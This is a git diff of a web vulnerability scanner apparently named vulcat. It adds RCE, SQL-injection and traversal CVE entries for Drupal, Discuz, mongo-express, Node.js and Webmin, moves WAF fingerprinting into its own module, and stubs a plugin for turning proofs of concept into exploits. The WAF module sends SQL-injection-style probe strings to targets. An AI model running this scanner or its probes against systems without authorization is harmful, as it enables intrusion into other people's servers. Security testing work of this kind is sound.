+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution |
+| Webmin | CVE-2019-15642 | RCE | POST | Webmin Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
```
@@ -213,8 +224,9 @@ Options:
Supported target types(Case insensitive):
AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue
- nce,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloa
- k,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou
+ nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,
+ keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w
+ eblogic,webmin,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index f474a5f..86d8fe2 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -5,10 +5,12 @@
from lib.initial.config import config
from lib.tool.logger import logger
-from lib.tool.fingerprint import identify
from lib.tool import check
from lib.report import output
+from lib.plugins.fingerprint.waf import waf
+from lib.plugins.fingerprint.webapp import webapp
+
from payloads.AlibabaDruid import alidruid
from payloads.AlibabaNacos import nacos
from payloads.ApacheAirflow import airflow
@@ -20,6 +22,7 @@
from payloads.AppWeb import appweb
from payloads.AtlassianConfluence import confluence
from payloads.Cisco import cisco
+from payloads.Discuz import discuz
from payloads.Django import django
from payloads.Drupal import drupal
from payloads.ElasticSearch import elasticsearch
@@ -28,6 +31,8 @@
from payloads.Jenkins import jenkins
from payloads.Keycloak import keycloak
# from payloads.Kindeditor import kindeditor
+from payloads.MongoExpress import mongoexpress
+from payloads.Nodejs import nodejs
from payloads.NodeRED import nodered
from payloads.ShowDoc import showdoc
from payloads.Spring import spring
@@ -73,7 +78,7 @@ def start(self):
# * --------------------WAF指纹识别--------------------
if (not self.no_waf):
- waf_info = identify.waf_identify(u) # * WAF指纹识别
+ waf_info = waf.identify(u) # * WAF指纹识别
if waf_info:
while True:
if (not self.batch): # * 是否使用默认选项
@@ -102,8 +107,8 @@ def start(self):
# * --------------------框架指纹识别--------------------
if ((self.application == 'auto') and (not self.vuln)):
logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
- identify.stop = self.stop
- new_app_list = identify.webapp_identify(u)
+ webapp.stop = self.stop
+ new_app_list = webapp.identify(u)
if new_app_list:
logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
self.app_list = new_app_list
@@ -113,7 +118,7 @@ def start(self):
# * --------------------框架指纹识别--------------------
if self.no_poc:
- logger.info('red', '[No-POC] 不进行漏洞扫描')
+ logger.info('red', self.lang['core']['start']['no_poc'])
continue
if check.check_connect(u):
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 4df1ab0..5c8fd94 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -70,7 +70,7 @@ def __init__(self, args):
'Connection': 'close'
}
if args.cookie:
- args.headers['Cookie'] = args.cookie
+ args.headers['Cookie'] = args.cookie.lstrip('Cookie: ')
args.proxies = {
'http': args.http_proxy,
@@ -84,13 +84,14 @@ def __init__(self, args):
app_list = [
'alidruid', 'airflow', 'apisix', 'appweb',
'cisco', 'confluence',
- 'django', 'drupal',
+ 'discuz', 'django', 'drupal',
'elasticsearch',
'f5bigip', 'fastjson', 'flink',
'jenkins',
# 'keycloak', 'kindeditor',
'keycloak',
- 'nacos', 'nodered',
+ 'mongoexpress',
+ 'nacos', 'nodered', 'nodejs',
'showdoc', 'solr', 'struts2', 'spring',
'thinkphp', 'tomcat',
'ueditor',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 0de1ce0..d9054e1 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -62,13 +62,14 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
'start': '[INFO] Start scanning target ',
'unable': '[WARN] Unable to connect to ',
- 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://'
+ 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://',
+ 'no_poc': '[No-POC] Disable Vulnerability scanning'
},
'waf_finger': {
'waf': '[INFO] The WAF detection for the current URL starts',
@@ -176,13 +177,14 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
'unable': '[WARN] 无法连接到 ',
- 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头'
+ 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头',
+ 'no_poc': '[No-POC] 不进行漏洞扫描'
},
'waf_finger': {
'waf': '[INFO] 对当前url进行WAF检测, 请稍等...',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 0f08cf5..e9e3709 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -8,18 +8,18 @@ def list():
''' 显示漏洞列表 '''
vul_num = 0
vul_list = ''
- vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
vul_num += 1
vul_list += '| {}|'.format(vul.ljust(21))
- vul_list += ' {}|'.format(info['vul_id'].ljust(17))
+ vul_list += ' {}|'.format(info['vul_id'].ljust(19))
vul_list += ' {}|'.format(info['type'].ljust(13))
vul_list += ' {}|'.format(info['method'].ljust(9))
- vul_list += ' {}\t|'.format(info['description'].ljust(56))
+ vul_list += ' {}\t|'.format(info['description'].ljust(62))
vul_list += '\n'
- vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
print(color.cyan(vul_list + str(vul_num - 1)))
# print(vul_num)
@@ -170,6 +170,14 @@ def list():
'description': '思科ASA/FTD XSS跨站脚本攻击'
}
],
+ 'Discuz': [
+ {
+ 'vul_id': 'wooyun-2010-080723',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': '全局变量防御绕过RCE'
+ }
+ ],
'Django': [
{
'vul_id': 'CVE-2017-12794',
@@ -203,11 +211,29 @@ def list():
}
],
'Drupal': [
+ {
+ 'vul_id': 'CVE-2014-3704',
+ 'type': 'SQLinject',
+ 'method': 'POST',
+ 'description': 'Drupal < 7.32 Drupalgeddon SQL 注入'
+ },
+ {
+ 'vul_id': 'CVE-2017-6920',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Drupal Core 8 PECL YAML 反序列化代码执行'
+ },
{
'vul_id': 'CVE-2018-7600',
'type': 'RCE',
'method': 'POST',
'description': 'Drupal Drupalgeddon 2 远程代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2018-7602',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Drupal 远程代码执行'
}
],
'ElasticSearch': [
@@ -288,6 +314,28 @@ def list():
# 'description': 'Kindeditor 目录遍历'
# }
# ],
+ 'mongo-express': [
+ {
+ 'vul_id': 'CVE-2019-10758',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': '未授权远程代码执行'
+ }
+ ],
+ 'Nodejs': [
+ {
+ 'vul_id': 'CVE-2017-14849',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Node.js目录穿越'
+ },
+ {
+ 'vul_id': 'CVE-2021-21315',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'Node.js命令执行'
+ }
+ ],
'NodeRED': [
{
'vul_id': 'CVE-2021-3223',
@@ -414,6 +462,12 @@ def list():
'type': 'RCE',
'method': 'POST',
'description': 'Webmin Pre-Auth 远程代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-15642',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Webmin 远程代码执行'
}
],
'Yonyou': [
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 364a3f2..5bf0348 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -19,7 +19,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.0\n')
+''', version='vulcat.py-1.1.1\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -29,7 +29,7 @@ def parse():
# * 可选参数
optional = parser.add_option_group(lang['optional_help']['title'], lang['optional_help']['name'])
optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread'])
- optional.add_option('--delay', type='int', dest='delay', default=1, help=lang['optional_help']['delay'])
+ optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
@@ -40,6 +40,7 @@ def parse():
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
+ # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令')
# * 第三方api, 例如dnslog/ceye
api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name'])
diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py
new file mode 100644
index 0000000..67d4600
--- /dev/null
+++ b/lib/plugins/Exp.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ 插件:
+ POC转EXP
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+import re
+
+def exp(result):
+ pass
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/waf.py b/lib/plugins/fingerprint/waf.py
new file mode 100644
index 0000000..bf009d4
--- /dev/null
+++ b/lib/plugins/fingerprint/waf.py
@@ -0,0 +1,178 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ web应用程序防火墙 指纹识别
+ 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
+'''
+
+from lib.initial.config import config
+from lib.tool.logger import logger
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+import re
+
+class WafIdentify():
+ def identify(self, url):
+ '''
+ waf识别
+ '''
+ try:
+ vul_info = {
+ 'app_name': 'Waf',
+ 'vul_id': 'identify'
+ }
+ path_1 = '?id=1 and 1=1 -- qwe'
+ path_2 = '?id=1\'">//'
+
+ url_1 = url + path_1
+ url_2 = url + path_2
+
+ logger.info('yellow_ex', self.lang['core']['waf_finger']['waf'])
+
+ res = requests.get(
+ url_2,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ res.encoding = 'utf-8'
+ for waf_fp in self.waf_finger:
+ for finger in waf_fp['fingerprint']:
+ # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
+ if (finger in res.text):
+ return waf_fp['name']
+
+ return None
+ except requests.ConnectTimeout:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_timeout'])
+ return None
+ except requests.ConnectionError:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_conn_error'])
+ return None
+ except:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_error'])
+ return None
+
+
+ def __init__(self):
+ self.delay = config.get('delay')
+ self.lang = config.get('lang')
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ # * waf指纹库
+ self.waf_finger = [
+ {
+ 'name': '阿里云盾(Aliyun Waf)',
+ 'status_code': 405,
+ 'fingerprint': [
+ '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
+ 'your request has been blocked as it may cause potential threats to the server'
+ ]
+ },
+ {
+ 'name': '腾讯云盾(Tencent WAF)',
+ 'status_code': 403,
+ 'fingerprint': [
+ '腾讯T-Sec Web应用防火墙(WAF)',
+ # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
+ ]
+ },
+ {
+ 'name': '安全狗(SafeDog)',
+ 'status_code': None,
+ 'fingerprint': [
+ '如果您是网站管理员,请登录安全狗',
+ '您的请求带有不合法参数,已被网站管理员设置拦截'
+ ]
+ },
+ {
+ 'name': '华为云盾(HuaWei WAF)',
+ 'status_code': 418,
+ 'fingerprint': [
+ '您的请求疑似攻击行为'
+ ]
+ },
+ {
+ 'name': '网宿云盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您当前的访问行为存在异常,请稍后重试'
+ ]
+ },
+ {
+ 'name': '创宇盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '当前访问疑似黑客攻击,已被创宇盾拦截',
+ '最近有可疑的攻击行为,请稍后重试'
+ ]
+ },
+ {
+ 'name': '玄武盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您的访问可能对网站造成危险,已被云防护安全拦截'
+ ]
+ },
+ # {
+ # 'name': '360网站卫士',
+ # 'status_code': None,
+ # 'fingerprint': [
+ # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
+ # ]
+ # },
+ # {
+ # 'name': '奇安信网站卫士 ',
+ # 'status_code': 493,
+ # 'fingerprint': [
+ # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
+ # ]
+ # },
+ {
+ 'name': '长亭SafeLine',
+ 'status_code': 403,
+ 'fingerprint': [
+ '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
+ ]
+ },
+ {
+ 'name': 'OpenRASP',
+ 'status_code': 400,
+ 'fingerprint': [
+ 'Request blocked by OpenRASP',
+ '您的请求包含恶意行为,已被服务器拒绝'
+ ]
+ },
+ {
+ 'name': '西部数码云网盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '检测到疑似攻击行为,访问已被云网盾拦截',
+ '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
+ ]
+ },
+ {
+ 'name': '云WAF(waf种类暂时未知)',
+ 'status_code': 461,
+ 'fingerprint': [
+ '请求被WEB防火墙拦截'
+ ]
+ }
+ # {
+ # 'name': '',
+ # 'status_code': 403,
+ # 'fingerprint': [
+ # ''
+ # ]
+ # }
+ ]
+
+waf = WafIdentify()
\ No newline at end of file
diff --git a/lib/tool/fingerprint.py b/lib/plugins/fingerprint/webapp.py
similarity index 72%
rename from lib/tool/fingerprint.py
rename to lib/plugins/fingerprint/webapp.py
index e8751b2..8a92d33 100644
--- a/lib/tool/fingerprint.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -2,9 +2,6 @@
# -*- coding:utf-8 -*-
'''
- web应用程序防火墙 指纹识别
- 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
-
web应用程序/框架 指纹识别
...
'''
@@ -16,8 +13,8 @@
from time import sleep
import re
-class Identify():
- def webapp_identify(self, url):
+class WebappIdentify():
+ def identify(self, url):
'''
web应用程序/框架识别
'''
@@ -91,52 +88,6 @@ def webapp_identify(self, url):
logger.info('red_ex', self.lang['core']['web_finger']['web_error'])
return None
- def waf_identify(self, url):
- '''
- waf识别
- '''
- try:
- vul_info = {
- 'app_name': 'Waf',
- 'vul_id': 'identify'
- }
- path_1 = '?id=1 and 1=1 -- qwe'
- path_2 = '?id=1\'">//'
-
- url_1 = url + path_1
- url_2 = url + path_2
-
- logger.info('yellow_ex', self.lang['core']['waf_finger']['waf'])
-
- res = requests.get(
- url_2,
- timeout=self.timeout,
- headers=self.headers,
- proxies=self.proxies,
- verify=False,
- allow_redirects=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
-
- res.encoding = 'utf-8'
- for waf_fp in self.waf_finger:
- for finger in waf_fp['fingerprint']:
- # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
- if (finger in res.text):
- return waf_fp['name']
-
- return None
- except requests.ConnectTimeout:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_timeout'])
- return None
- except requests.ConnectionError:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_conn_error'])
- return None
- except:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_error'])
- return None
-
-
def __init__(self):
self.delay = config.get('delay')
self.lang = config.get('lang')
@@ -273,6 +224,18 @@ def __init__(self):
# r'' # * 还没有添加指纹
# ]
# },
+ {
+ 'name': 'discuz',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'
Discuz! Board - Powered by Discuz!',
+ r'.*Discuz! Board - Powered by Discuz!',
+ r'Discuz! Board » 首页',
+ r'',
+ r'Powered by Discuz!'
+ ]
+ },
{
'name': 'django',
'path': '',
@@ -294,8 +257,11 @@ def __init__(self):
'path': '',
'data': '',
'fingerprint': [
- r'name="Generator" content="Drupal 8 (https://www\.drupal\.org)"',
- r'data-drupal-link-system-path=".*"'
+ r'name="Generator" content="Drupal \d \(http(s)?://(w){0,3}\.?drupal\.org\)"',
+ r'data-drupal-link-system-path=".*"',
+ r'jQuery\.extend\(Drupal\.settings, {"basePath',
+ r'There is a security update available for your version of Drupal\. To ensure the security of your server, you should update immediately! See the',
+ r'Powered by Drupal'
]
},
{
@@ -356,6 +322,25 @@ def __init__(self):
# r'KindEditor - WYSIWYG HTML Editor for Internet'
# ]
# },
+ {
+ 'name': 'mongoexpress',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'.* - Mongo Express',
+ r'Mongo Express',
+ r'Mongo Express
'
+ ]
+ },
+ {
+ 'name': 'nodejs',
+ 'path': '/404',
+ 'data': '',
+ 'fingerprint': [
+ r'Cannot GET /.*
'
+ ]
+ },
{
'name': 'nodered',
'path': '',
@@ -396,12 +381,25 @@ def __init__(self):
r'"timestamp":.*"status":404',
]
},
+ {
+ 'name': 'thinkphp',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'十年磨一剑-为API开发设计的高性能框架',
+ r'十年磨一剑 - 为API开发设计的高性能框架',
+ r':\)',
+ r'ThinkPHP.*V.*'
+ ]
+ },
{
'name': 'thinkphp',
'path': 'qwe/', # * 访问一个不存在的路径时会提示相应信息
'data': '',
'fingerprint': [
r'十年磨一剑-为API开发设计的高性能框架',
+ r'十年磨一剑 - 为API开发设计的高性能框架',
+ r':\)',
r'ThinkPHP.*V.*'
]
},
@@ -447,7 +445,11 @@ def __init__(self):
'data': '',
'fingerprint': [
r'You must enter a username and password to login to the server on\w*',
- r'Login to Webmin'
+ r'Login to Webmin',
+ r'label aria-label="Webmin" data-container="#content"',
+ r'form id="webmin_search_form" action="/webmin_search\.cgi"',
+ r'Webmin Configuration.*Webmin Servers Index.*Webmin Users',
+ r'a href="/webmin/refresh_modules.cgi" class="navigation_module_trigger"'
]
},
{
@@ -481,112 +483,4 @@ def __init__(self):
# }
]
- # * waf指纹库
- self.waf_finger = [
- {
- 'name': '阿里云盾(Aliyun Waf)',
- 'status_code': 405,
- 'fingerprint': [
- '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
- 'your request has been blocked as it may cause potential threats to the server'
- ]
- },
- {
- 'name': '腾讯云盾(Tencent WAF)',
- 'status_code': 403,
- 'fingerprint': [
- '腾讯T-Sec Web应用防火墙(WAF)',
- # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
- ]
- },
- {
- 'name': '安全狗(SafeDog)',
- 'status_code': None,
- 'fingerprint': [
- '如果您是网站管理员,请登录安全狗',
- '您的请求带有不合法参数,已被网站管理员设置拦截'
- ]
- },
- {
- 'name': '华为云盾(HuaWei WAF)',
- 'status_code': 418,
- 'fingerprint': [
- '您的请求疑似攻击行为'
- ]
- },
- {
- 'name': '网宿云盾',
- 'status_code': None,
- 'fingerprint': [
- '您当前的访问行为存在异常,请稍后重试'
- ]
- },
- {
- 'name': '创宇盾',
- 'status_code': None,
- 'fingerprint': [
- '当前访问疑似黑客攻击,已被创宇盾拦截',
- '最近有可疑的攻击行为,请稍后重试'
- ]
- },
- {
- 'name': '玄武盾',
- 'status_code': None,
- 'fingerprint': [
- '您的访问可能对网站造成危险,已被云防护安全拦截'
- ]
- },
- # {
- # 'name': '360网站卫士',
- # 'status_code': None,
- # 'fingerprint': [
- # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
- # ]
- # },
- # {
- # 'name': '奇安信网站卫士 ',
- # 'status_code': 493,
- # 'fingerprint': [
- # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
- # ]
- # },
- {
- 'name': '长亭SafeLine',
- 'status_code': 403,
- 'fingerprint': [
- '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
- ]
- },
- {
- 'name': 'OpenRASP',
- 'status_code': 400,
- 'fingerprint': [
- 'Request blocked by OpenRASP',
- '您的请求包含恶意行为,已被服务器拒绝'
- ]
- },
- {
- 'name': '西部数码云网盾',
- 'status_code': None,
- 'fingerprint': [
- '检测到疑似攻击行为,访问已被云网盾拦截',
- '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
- ]
- },
- {
- 'name': '云WAF(waf种类暂时未知)',
- 'status_code': 461,
- 'fingerprint': [
- '请求被WEB防火墙拦截'
- ]
- }
- # {
- # 'name': '',
- # 'status_code': 403,
- # 'fingerprint': [
- # ''
- # ]
- # }
- ]
-
-identify = Identify()
\ No newline at end of file
+webapp = WebappIdentify()
\ No newline at end of file
diff --git a/lib/report/output.py b/lib/report/output.py
index 72dbc39..a0a8b63 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -5,13 +5,20 @@
from lib.initial.config import config
from lib.tool.timed import nowtime_year
from lib.tool.logger import logger
+from thirdparty import requests
+# from lib.plugins.Exp import exp
import json
+import http.client
def output_info(results, lang):
+ # cmd = config.get('command')
+
logger.info('cyan_ex', lang['output']['info']['wait']) # ? 日志, 正在处理扫描结果
results_info_list = []
for result in results:
+ # if (result and cmd):
+ # exp(result)
if result:
results_info = ''
results_info += output_vul_info_color(result)
@@ -67,12 +74,17 @@ def output_json(results, filename, lang):
if result:
f = open(filename, 'a')
- results_info = {
+ result_info = {
'Time': nowtime_year()
}
- results_info.update(result)
+ result_info.update(result)
- results_info_list.append(json.dumps(results_info, indent=4) + '\n')
+ # * Response对象不能json化, 转为字符串
+ for key in result_info.keys():
+ if type(result_info[key]) == requests.models.Response:
+ result_info[key] = output_res(result_info[key], iscolor=False)
+
+ results_info_list.append(json.dumps(result_info, indent=4) + '\n')
results_info_list = set(results_info_list)
if results_info_list:
@@ -103,27 +115,17 @@ def output_vul_info_color(result):
for key, value in result.items():
value_type = type(value) # * 保存value类型
- # * key: value
if value_type == str: # * str输出方式
- result_info += color.yellow_ex(key) + color.reset(': ' + value + '\n| ')
- # * key: value1, value2, value3
+ result_info += output_str(key, value)
+
elif value_type == list: # * list输出方式
- result_info += color.yellow_ex(key) + color.reset(': ')
- for v in value:
- result_info += v + ' '
- result_info += '\n| '
- # * key1: value1
- # * key2: value2
- # * ...
+ result_info += output_list(key, value)
+
elif value_type == dict: # * dict输出方式
- result_info += '\r| ' + color.red_ex(key) + color.reset(':\t' + '\n')
- for k_father, v_father in value.items():
- if ('Headers' == k_father):
- result_info += '| ' + color.yellow_ex(k_father + ':\n')
- for k_child, v_child in v_father.items():
- result_info += '| ' + color.yellow_ex(k_child) + color.reset(': ' + v_child + '\n')
- else:
- result_info += '| ' + color.yellow_ex(k_father) + color.reset(': ' + v_father + '\n')
+ result_info += output_dict(key, value)
+
+ elif value_type == requests.models.Response: # * Response输出方式
+ result_info += output_res(value)
return result_info
@@ -133,21 +135,108 @@ def output_vul_info(result):
for key, value in result.items():
value_type = type(value)
if value_type == str:
- result_info += key + ': ' + value + '\n| '
+ result_info += output_str(key, value, iscolor=False)
elif value_type == list:
- result_info += key + ': '
- for v in value:
- result_info += v + ' '
- result_info += '\n| '
+ result_info += output_list(key, value, iscolor=False)
elif value_type == dict:
- result_info += key + ':\t' + '\n'
- for k_father, v_father in value.items():
- if ('Headers' == k_father):
- result_info += '| ' + k_father + ':\n'
- for k_child, v_child in v_father.items():
- result_info += '| ' + k_child + ': ' + v_child + '\n'
- else:
- result_info += '| ' + k_father + ': ' + v_father + '\n'
- return result_info
\ No newline at end of file
+ result_info += output_dict(key, value, iscolor=False)
+
+ elif value_type == requests.models.Response:
+ result_info += output_res(value, iscolor=False)
+
+ return result_info
+
+def output_str(key, value, iscolor=True):
+ ''' 接收键值, 返回key: value '''
+ info_str = ''
+
+ if iscolor:
+ info_str += color.yellow_ex(key) + color.reset(': ' + value + '\n| ')
+ else:
+ info_str += key + ': ' + value + '\n| '
+
+ return info_str
+
+def output_list(key, value, iscolor=True):
+ ''' 接收键值, 返回key: value1 value2 value3 '''
+ info_list = ''
+
+ if iscolor:
+ info_list += color.yellow_ex(key) + color.reset(': ')
+ for v in value:
+ info_list += v + ' '
+ info_list += '\n| '
+ else:
+ info_list += key + ': '
+ for v in value:
+ info_list += v + ' '
+ info_list += '\n| '
+
+ return info_list
+
+def output_dict(key, value, iscolor=True):
+ ''' 接收键值, 返回
+ key:
+ key1: value1
+ key2: value2
+ '''
+ info_dict = ''
+
+ if iscolor:
+ info_dict += '\r| ' + color.red_ex(key) + color.reset(':\t' + '\n')
+ for k_father, v_father in value.items():
+ if ('Headers' == k_father):
+ info_dict += '| ' + color.yellow_ex(k_father + ':\n')
+ for k_child, v_child in v_father.items():
+ info_dict += '| ' + color.yellow_ex(k_child) + color.reset(': ' + v_child + '\n')
+ else:
+ info_dict += '| ' + color.yellow_ex(k_father) + color.reset(': ' + v_father + '\n')
+ else:
+ info_dict += key + ':\t' + '\n'
+ for k_father, v_father in value.items():
+ if ('Headers' == k_father):
+ info_dict += '| ' + k_father + ':\n'
+ for k_child, v_child in v_father.items():
+ info_dict += '| ' + k_child + ': ' + v_child + '\n'
+ else:
+ info_dict += '| ' + k_father + ': ' + v_father + '\n'
+
+ return info_dict
+
+def output_res(res, iscolor=True):
+ ''' 接收一个requests结果, 返回一个http数据包 '''
+ info_res = ''
+
+ if iscolor:
+ try:
+ info_res += color.red_ex(' [Request')
+ info_res += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
+ info_res += color.black_ex('\n' + 'Host' + ': ' + logger.get_domain(res.request.url))
+
+ for key, value in res.request.headers.items():
+ info_res += color.black_ex('\n' + key + ': ' + value)
+ if res.request.body:
+ info_res += color.black_ex('\n\n' + res.request.body)
+
+ info_res += color.red_ex(']')
+ info_res += color.reset('\n')
+ except:
+ return info_res
+ else:
+ try:
+ info_res += ' [Request'
+ info_res += '\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str
+ info_res += '\n' + 'Host' + ': ' + logger.get_domain(res.request.url)
+
+ for key, value in res.request.headers.items():
+ info_res += '\n' + key + ': ' + value
+ if res.request.body:
+ info_res += '\n\n' + res.request.body
+
+ info_res += ']'
+ except:
+ return info_res
+
+ return info_res
\ No newline at end of file
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 254f1e0..9da38f2 100644
